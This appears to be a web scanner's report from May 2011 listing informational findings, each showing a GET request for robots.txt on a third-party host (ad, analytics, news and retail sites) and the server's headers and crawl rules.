Severity: | Information |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /asp/usatly/handler.ashx |
GET /robots.txt HTTP/1.0 Host: i.usatoday.net |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT Accept-Ranges: bytes ETag: "0eda5b4165ccb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Content-Length: 1660 Date: Mon, 16 May 2011 01:19:46 GMT Connection: close # robots.txt for http://www.usatoday.com sitemap: http://www.usatoday.com User-agent:* Disallow:/feedback Disallow:/HTML Disallow:/html Disallow:/cgi-bin Disallow:/system ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://images.scanalert |
Path: | /meter/www.mcafee.com/55 |
GET /robots.txt HTTP/1.0 Host: images.scanalert.com |
HTTP/1.0 200 OK Server: McAfeeSecure ETag: "EKdW2Rg2Pnr" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=utf-8 Content-Length: 44 Date: Mon, 16 May 2011 01:39:43 GMT Connection: close Cache-Control: private # Allow Everything User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://imawow.weather.com |
Path: | /web/common/wxicons/36/26 |
GET /robots.txt HTTP/1.0 Host: imawow.weather.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:59 GMT Server: Apache SVRNAME: web1x06 Last-Modified: Wed, 19 Sep 2007 14:46:16 GMT Accept-Ranges: bytes Content-Length: 206 Vary: Accept-Encoding Keep-Alive: timeout=1, max=7478 Connection: Keep-Alive Content-Type: text/plain # /robots.txt User-agent: * Disallow: /cgi-bin Disallow: /fcgi-bin Disallow: /interact/photogallery Disallow: /interact/photogallery Disallow: /RealMedia Disallow: /search/pa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://l.addthiscdn.com |
Path: | /live/t00/250lo.gif |
GET /robots.txt HTTP/1.0 Host: l.addthiscdn.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT ETag: "cc0d3a-1b-4a1f8e226d640" Content-Type: text/plain; charset=UTF-8 Date: Mon, 16 May 2011 01:25:43 GMT Content-Length: 27 Connection: close User-agent: * Disallow: * |
Severity: | Information |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /robots.txt HTTP/1.0 Host: login.dotomi.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:38:30 GMT Server: Apache X-Name: dmc-o01 Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT ETag: "3500070-a2-495adbd05d700 Accept-Ranges: bytes Content-Length: 162 Connection: close Content-Type: text/plain X-Pad: avoid browser bug #do not edit this file in ms-platform, you need unix line seperators for it. #this file will disallow any robots to search the dmc. User-Agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://metrics.fingerhut |
Path: | /b/ss/fingerhutcomprod/1 |
GET /robots.txt HTTP/1.0 Host: metrics.fingerhut.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:35 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT ETag: "1d516e-18-73736540" Accept-Ranges: bytes Content-Length: 24 xserver: www321 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://metrics.mcafee.com |
Path: | /b/ss/mcafeecomglobal/1/H |
GET /robots.txt HTTP/1.0 Host: metrics.mcafee.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:52 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT ETag: "115104-18-73736540" Accept-Ranges: bytes Content-Length: 24 xserver: www82 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://metrics.sonystyle |
Path: | /b/ss/sonysonystyle2 |
GET /robots.txt HTTP/1.0 Host: metrics.sonystyle.com |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:00 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT ETag: "58178-18-6e161ac0" Accept-Ranges: bytes Content-Length: 24 xserver: www618 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://metrics.us |
Path: | /b/ss/sceablogsprod/1/H |
GET /robots.txt HTTP/1.0 Host: metrics.us.playstation |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:26:45 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT ETag: "3a02e-18-73736540" Accept-Ranges: bytes Content-Length: 24 xserver: www16 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://newsrss.bbc.co.uk |
Path: | /rss/newsonline_world |
GET /robots.txt HTTP/1.0 Host: newsrss.bbc.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT Content-Length: 26 Content-Type: text/plain Cache-Control: max-age=86906478 Expires: Fri, 14 Feb 2014 18:00:21 GMT Date: Sun, 15 May 2011 21:19:03 GMT Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://nexus2.ensighten |
Path: | /sony/serverComponent.php |
GET /robots.txt HTTP/1.0 Host: nexus2.ensighten.com |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 21:20:10 GMT Server: Apache Last-Modified: Fri, 17 Dec 2010 04:42:59 GMT ETag: "4b9e5-1a-49793ce00fac0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding Connection: close Content-Type: text/plain User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/ping.html |
GET /robots.txt HTTP/1.0 Host: odb.outbrain.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"30-1286979798000" Last-Modified: Wed, 13 Oct 2010 14:23:18 GMT Content-Type: text/plain Content-Length: 30 Date: Mon, 16 May 2011 01:19:53 GMT Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /pagead/imgad |
GET /robots.txt HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK Content-Type: text/plain Date: Mon, 16 May 2011 01:19:52 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block User-Agent: * Allow: /ads/preferences/ Disallow: / Noindex: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://pastebin.com |
Path: | /trends |
GET /robots.txt HTTP/1.0 Host: pastebin.com |
HTTP/1.1 200 OK Server: nginx/0.8.52 Date: Sun, 15 May 2011 21:30:45 GMT Content-Type: text/plain Content-Length: 178 Last-Modified: Sun, 06 Mar 2011 10:57:33 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes User-agent: * Disallow: /download.php Disallow: /report.php Disallow: /raw.php Disallow: /embed.php Disallow: /embed_iframe.php Disallow: /embed_js.php Disallow: /diff.php |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /pubmatic_sync |
GET /robots.txt HTTP/1.0 Host: pixel.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:19:50 GMT Content-Type: text/plain Content-Length: 26 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /gampad/ads |
GET /robots.txt HTTP/1.0 Host: pubads.g.doubleclick.net |
HTTP/1.0 200 OK Content-Type: text/plain Date: Mon, 16 May 2011 01:19:45 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block User-Agent: * Allow: /ads/preferences/ Disallow: / Noindex: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/beacon |
GET /robots.txt HTTP/1.0 Host: r.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Date: Sun, 15 May 2011 20:26:59 GMT Connection: close User-agent: * Disallow: /app Disallow: /server |
Severity: | Information |
Confidence: | Certain |
Host: | http://rs.instantservice |
Path: | /resources/smartbutton |
GET /robots.txt HTTP/1.0 Host: rs.instantservice.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:46 GMT Server: Apache Last-Modified: Tue, 22 Mar 2011 14:43:25 GMT ETag: "1a-443ebd40" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://s7.addthis.com |
Path: | /js/250/addthis_widget.js |
GET /robots.txt HTTP/1.0 Host: s7.addthis.com |
HTTP/1.0 200 OK Server: Apache Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT ETag: "cc0d3a-1b-4a1f8e226d640" Content-Type: text/plain; charset=UTF-8 Date: Mon, 16 May 2011 01:19:42 GMT Content-Length: 27 Connection: close User-agent: * Disallow: * |
Severity: | Information |
Confidence: | Certain |
Host: | http://secureshopping |
Path: | / |
GET /robots.txt HTTP/1.0 Host: secureshopping.mcafee.com |
HTTP/1.0 200 OK Vary: Accept-Encoding Server: McAfeeSecure ETag: "CdLEBc9iPaz" Last-Modified: Thu, 31 Mar 2011 18:07:30 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=utf-8 Content-Length: 497 Date: Mon, 16 May 2011 01:39:53 GMT User-agent: * Disallow: /js/ Disallow: /css/ Disallow: /error/ Disallow: /shop/*?brand=* Disallow: /shop/*?merchant=* Disallow: /shop/*?rating=* Disallow: /shop/*?priceMin=* Disallow: /shop/*? ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://serv.adspeed.com |
Path: | /ad.php |
GET /robots.txt HTTP/1.0 Host: serv.adspeed.com |
HTTP/1.0 200 OK Content-Type: text/plain Accept-Ranges: bytes Last-Modified: Fri, 24 Apr 2009 00:08:03 GMT Content-Length: 153 Connection: close Date: Mon, 16 May 2011 01:20:33 GMT Server: AdSpeed/s5 User-agent: * Disallow: /fw/ Disallow: /as/ Disallow: /ad.php Disallow: /Users/checkUserNameAJAX Sitemap: http://www.adspeed.com |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.links |
Path: | /pages/prices.asp |
GET /robots.txt HTTP/1.0 Host: sony.links.channelin |
HTTP/1.0 200 OK Content-Length: 93 Content-Type: text/plain Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT Accept-Ranges: bytes ETag: "80132b41e16cc41:2dd2" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Date: Sun, 15 May 2011 20:26:33 GMT Connection: close User-agent: * # applies to all robots Disallow: / # disallow indexing of all pages |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.links.origin |
Path: | /pages/wl.asp |
GET /robots.txt HTTP/1.0 Host: sony.links.origin |
HTTP/1.1 200 OK Content-Length: 93 Content-Type: text/plain Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT Accept-Ranges: bytes ETag: "80132b41e16cc41:2dd2" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Date: Sun, 15 May 2011 20:26:47 GMT Connection: close User-agent: * # applies to all robots Disallow: / # disallow indexing of all pages |
Severity: | Information |
Confidence: | Certain |
Host: | http://sony.tt.omtrdc.net |
Path: | /m2/sony/mbox/ajax |
GET /robots.txt HTTP/1.0 Host: sony.tt.omtrdc.net |
HTTP/1.1 200 OK ETag: W/"25-1299290853000" Accept-Ranges: bytes Content-Length: 25 Date: Sun, 15 May 2011 21:19:59 GMT Connection: close Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT Server: Test & Target Content-Type: text/plain User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /robots.txt HTTP/1.0 Host: sonycomputerentertai.tt |
HTTP/1.1 200 OK ETag: W/"25-1299290853000" Accept-Ranges: bytes Content-Length: 25 Date: Sun, 15 May 2011 20:26:46 GMT Connection: close Last-Modified: Sat, 05 Mar 2011 02:07:33 GMT Server: Test & Target Content-Type: text/plain User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /connect/xd_proxy.php |
GET /robots.txt HTTP/1.0 Host: static.ak.fbcdn.net |
HTTP/1.0 200 OK Content-Type: text/plain;charset=utf-8 X-FB-Server: 10.138.17.185 Date: Sun, 15 May 2011 20:27:09 GMT Content-Length: 2553 Connection: close # Notice: if you would like to crawl Facebook you can # contact us here: http://www.facebook.com # to apply for white listing. Our general terms are available # at http://ww ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.bhphot |
Path: | /FrameWork/css/min/reset |
GET /robots.txt HTTP/1.0 Host: static.bhphotovideo.com |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT ETag: "491-4d9fcd27" Cache-Control: no-cache Date: Mon, 16 May 2011 01:42:38 GMT Content-Length: 1169 Connection: close User-agent: * Disallow: /c/search* Disallow: /search* Disallow: /federal Disallow: */edu Disallow: /c/find/ Disallow: /impact/ Disallow: /find/organizational Disallow: /find/gsa.jsp Disallo ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /sync/img |
GET /robots.txt HTTP/1.0 Host: sync.mathtag.com |
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/html P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2218 8728 Connection: keep-alive Content-Length: 26 User-agent: * Disallow: * |
Severity: | Information |
Confidence: | Certain |
Host: | http://t.invitemedia.com |
Path: | /track_imp |
GET /robots.txt HTTP/1.0 Host: t.invitemedia.com |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:26:58 GMT Content-Type: text/plain Content-Length: 26 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.admeld.com |
Path: | /ad/js/201/unitedstates |
GET /robots.txt HTTP/1.0 Host: tag.admeld.com |
HTTP/1.0 200 OK Server: Apache P3P: policyref="http://tag Last-Modified: Thu, 12 May 2011 13:43:17 GMT ETag: "4cc899-1a-4a3145f192740" Accept-Ranges: bytes Content-Length: 26 Content-Type: text/plain Date: Mon, 16 May 2011 01:19:51 GMT Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /robots.txt HTTP/1.0 Host: tag.contextweb.com |
HTTP/1.0 200 OK Content-Length: 135 Content-Type: text/plain Last-Modified: Wed, 07 Feb 2007 15:35:46 GMT Accept-Ranges: bytes ETag: "18b4e0a2cd4ac71:351d" Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:19:49 GMT Connection: close User-agent: * Allow: /Corporate/ Disallow: /TagPublish/ Disallow: /xt2/ Disallow: /rt1/ Disallow: /CWClick/ Disallow: /ContextAd/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://travel.travelocity |
Path: | /favicon.ico |
GET /robots.txt HTTP/1.0 Host: travel.travelocity.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:30:06 GMT Server: Apache Last-Modified: Fri, 30 Oct 2009 13:04:04 GMT ETag: "1436b-cb-a98e9900" Accept-Ranges: bytes Content-Length: 203 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=ISO-8859-1 User-agent: * Disallow: Sitemap: http://travel.travelocity Sitemap: http://hotels.travelocity Sitemap: http://hotels.travelocity ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://travel.usatoday |
Path: | /cruises/post/2011/05 |
GET /robots.txt HTTP/1.0 Host: travel.usatoday.com |
HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Mon, 11 Apr 2011 15:05:52 GMT Accept-Ranges: bytes ETag: "ae247f359f8cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:19:35 GMT Connection: close Content-Length: 92 # robots.txt for http://travel.usatoday User-agent:* Disallow:/preview Disallow:/test |
Severity: | Information |
Confidence: | Certain |
Host: | http://ts.istrack.com |
Path: | /trackingAPI.js |
GET /robots.txt HTTP/1.0 Host: ts.istrack.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:33:22 GMT Server: Apache Last-Modified: Tue, 22 Mar 2011 14:41:55 GMT ETag: "3a774-1a-3ee172c0" Accept-Ranges: bytes Content-Length: 26 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=ISO-8859-1 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://turn.nexac.com |
Path: | /r/pu |
GET /robots.txt HTTP/1.0 Host: turn.nexac.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Date: Mon, 16 May 2011 01:26:46 GMT Connection: close User-agent: * Disallow: /app Disallow: /server |
Severity: | Information |
Confidence: | Certain |
Host: | http://usatoday1.112.2o7 |
Path: | /b/ss/usatodayprod |
GET /robots.txt HTTP/1.0 Host: usatoday1.112.2o7.net |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:53 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT ETag: "10a342-18-6e161ac0" Accept-Ranges: bytes Content-Length: 24 xserver: www78 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://w88.go.com |
Path: | /b/ss/wdgwdprodcl |
GET /robots.txt HTTP/1.0 Host: w88.go.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:27:17 GMT Server: Omniture DC/2.0.0 Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT ETag: "1bc16d-18-6e161ac0" Accept-Ranges: bytes Content-Length: 24 xserver: www610 Keep-Alive: timeout=15 Connection: close Content-Type: text/plain User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://webassets.scea.com |
Path: | /pscomauth/groups/public |
GET /robots.txt HTTP/1.0 Host: webassets.scea.com |
HTTP/1.1 200 OK Cache-Control: max-age=3600 Date: Sun, 15 May 2011 20:27:01 GMT Content-Length: 26 Content-Type: text/plain; charset=UTF-8 ETag: "1ce4cd9-1a-48f6a58fb1d40 Expires: Sun, 15 May 2011 14:50:00 GMT Last-Modified: Sat, 04 Sep 2010 07:53:49 GMT Accept-Ranges: bytes Server: Level-3 Origin Storage/1.5 Connection: close User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /robots.txt HTTP/1.0 Host: wow.weather.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:52 GMT Server: Apache SVRNAME: web2x04 Last-Modified: Fri, 04 Jun 2010 15:15:07 GMT Accept-Ranges: bytes Content-Length: 305 Vary: Accept-Encoding Keep-Alive: timeout=1, max=7488 Connection: Keep-Alive Content-Type: text/plain # /robots.txt User-agent: * Disallow: /cgi-bin Disallow: /fcgi-bin Disallow: /interact/photogallery Disallow: /interact/photogallery Disallow: /RealMedia Disallow: /search/pa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bhphotovideo |
Path: | /bnh/controller/home |
GET /robots.txt HTTP/1.0 Host: www.bhphotovideo.com |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Sat, 09 Apr 2011 03:06:15 GMT ETag: "491-4d9fcd27" Cache-Control: no-cache Date: Mon, 16 May 2011 01:41:44 GMT Content-Length: 1169 Connection: close User-agent: * Disallow: /c/search* Disallow: /search* Disallow: /federal Disallow: */edu Disallow: /c/find/ Disallow: /impact/ Disallow: /find/organizational Disallow: /find/gsa.jsp Disallo ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.cruisecritic |
Path: | /reviews/cruiseline.cfm |
GET /robots.txt HTTP/1.0 Host: www.cruisecritic.com |
HTTP/1.1 200 OK Cache-Control: max-age=31536000 Content-Length: 2896 Content-Type: text/plain Content-Location: http://www.cruisecritic Last-Modified: Mon, 01 Jun 2009 20:08:00 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:26:40 GMT Connection: close User-agent: * Disallow: _utm.gif Disallow: _utm.js Disallow: 411.cfm Disallow: adsetup.cfm Disallow: application.cfm Disallow: articlepopup.cfm Disallow: articlepopup_imageload Disallow: a ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /robots.txt HTTP/1.0 Host: www.facebook.com |
HTTP/1.0 200 OK Content-Type: text/plain;charset=utf-8 X-FB-Server: 10.54.99.28 Connection: close Content-Length: 2553 # Notice: if you would like to crawl Facebook you can # contact us here: http://www.facebook.com # to apply for white listing. Our general terms are available # at http://ww ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google |
Path: | /__utm.gif |
GET /robots.txt HTTP/1.0 Host: www.google-analytics.com |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT Date: Sun, 15 May 2011 20:26:35 GMT Expires: Sun, 15 May 2011 20:26:35 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /siteopt.js Disallow: /config.js |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.googleads |
Path: | /pagead/conversion |
GET /robots.txt HTTP/1.0 Host: www.googleadservices.com |
HTTP/1.0 200 OK Content-Type: text/plain Last-Modified: Mon, 09 May 2011 20:53:07 GMT Date: Sun, 15 May 2011 21:31:04 GMT Expires: Sun, 15 May 2011 21:31:04 GMT Cache-Control: private, max-age=0 Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block User-agent: * Disallow: /search Disallow: /groups Disallow: /images Disallow: /catalogs Disallow: /catalogues Disallow: /news Allow: /news/directory Disallow: /nwshp Disallow: /setnewsprefs? Disallow: ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mcafeesecure |
Path: | /us/forconsumers/mcafee |
GET /robots.txt HTTP/1.0 Host: www.mcafeesecure.com |
HTTP/1.0 200 OK Server: McAfeeSecure Cache-Control: private ETag: "EKdW2Rg2Pnr" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=utf-8 Content-Length: 44 Date: Mon, 16 May 2011 01:38:54 GMT # Allow Everything User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | /RatingVerify |
GET /robots.txt HTTP/1.0 Host: www.mcafeesecure.com |
HTTP/1.0 200 OK Server: McAfeeSecure Cache-Control: private ETag: "EKdW2Rg2Pnr" Last-Modified: Wed, 03 Sep 2008 18:43:59 GMT Accept-Ranges: bytes Content-Type: text/plain; charset=utf-8 Content-Length: 44 Date: Mon, 16 May 2011 01:37:36 GMT # Allow Everything User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.mickeypath.com |
Path: | /id/1304751739.jpg |
GET /robots.txt HTTP/1.0 Host: www.mickeypath.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:22:00 GMT Server: Apache Last-Modified: Sat, 19 Apr 2008 23:11:32 GMT ETag: "80fb74-a7-44b41fcbc5100" Accept-Ranges: bytes Content-Length: 167 Connection: close Content-Type: text/plain User-agent: * Disallow: /banners/ Disallow: /cache/ Disallow: /cgi/ Disallow: /db/ Disallow: /del/ Disallow: /images/ Disallow: /sliders/ Disallow: /stats/ |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.orbitz.com |
Path: | /favicon.ico |
GET /robots.txt HTTP/1.0 Host: www.orbitz.com |
HTTP/1.1 200 OK Last-Modified: Fri, 06 May 2011 16:12:43 GMT ETag: "23d-4a29dc27734c0" Content-Type: text/plain Content-Length: 573 Server: Apache Date: Mon, 16 May 2011 01:29:50 GMT Age: 359716 Connection: keep-alive Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe ## Last updated March 24, 2010 User-agent: * Disallow: /d.gif Disallow: /global/ Disallow: /img/ Disallow: /partner/ Disallow: /creditcard/ Disallow: /event.ng/ Disallow: /html.ng/ Disallow: /js.ng/ D ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.passporter.com |
Path: | /concierge/ticker |
GET /robots.txt HTTP/1.0 Host: www.passporter.com |
HTTP/1.1 200 OK Content-Length: 24 Content-Type: text/plain Last-Modified: Tue, 02 Jan 2007 01:16:24 GMT Accept-Ranges: bytes ETag: "e48cb19eb2ec71:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:23:29 GMT Connection: close User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/clientscript |
GET /robots.txt HTTP/1.0 Host: www.passporterboards.com |
HTTP/1.1 200 OK Content-Length: 24 Content-Type: text/plain Last-Modified: Tue, 02 Jan 2007 01:16:24 GMT Accept-Ranges: bytes ETag: "e48cb19eb2ec71:32df" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:19:55 GMT Connection: close User-agent: * Disallow: |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.popularmedia |
Path: | /widget/2be74c3e1d1b |
GET /robots.txt HTTP/1.0 Host: www.popularmedia.net |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:40:30 GMT Server: Apache/2.2.9 (Unix) Last-Modified: Fri, 13 May 2011 21:43:20 GMT ETag: "712f5-c8-4a32f31bb6e00" Accept-Ranges: bytes Content-Length: 200 Cache-Control: no-cache, must-revalidate, max-age=0 Expires: Mon, 16 May 2011 01:40:30 GMT Vary: Accept-Encoding Pragma: no-cache Connection: close Content-Type: text/plain; charset=UTF-8 # See http://www.robotstxt.org # # To ban all spiders from the entire site uncomment the next two lines: User-Agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.siteadvisor |
Path: | /download/windows.html |
GET /robots.txt HTTP/1.0 Host: www.siteadvisor.com |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:39:28 GMT Server: Apache Last-Modified: Wed, 09 Jul 2008 02:03:21 GMT ETag: "758185-167-4518db6812c40 Accept-Ranges: bytes Content-Length: 359 Connection: close Content-Type: text/plain User-agent: Googlebot Disallow: /cgi-bin/ User-agent: Slurp Disallow: /cgi-bin/ User-agent: Yahoo-NewsCrawler Disallow: /cgi-bin/ User-agent: msnbot Disallow: /cgi-bin/ User-agent: Teoma Disallow: ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.telegraph.co |
Path: | /sponsored/travel/disney |
GET /robots.txt HTTP/1.0 Host: www.telegraph.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 10 May 2011 14:01:46 GMT ETag: "6b1239-1ba-4a2ec65846719 Content-Type: text/plain Date: Mon, 16 May 2011 01:19:34 GMT Content-Length: 442 Connection: close # Robots.txt file # All robots will spider the domain User-agent: * Disallow: */ixale/ Disallow: /core/Content/ Disallow: /*?source=rss Disallow: /*?source=refresh Disallow: /*?mobile=true Disallow: ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.viddler.com |
Path: | /file/7d63c65a/html5 |
GET /robots.txt HTTP/1.0 Host: www.viddler.com |
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:40 GMT Content-Type: text/plain Connection: close Last-Modified: Mon, 11 Oct 2010 13:24:54 GMT ETag: "106c1d6-23-492574927d580 Accept-Ranges: bytes Content-Length: 35 Vary: Accept-Encoding User-Agent: * Disallow: /search/? |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /fingerhut/assets/images |
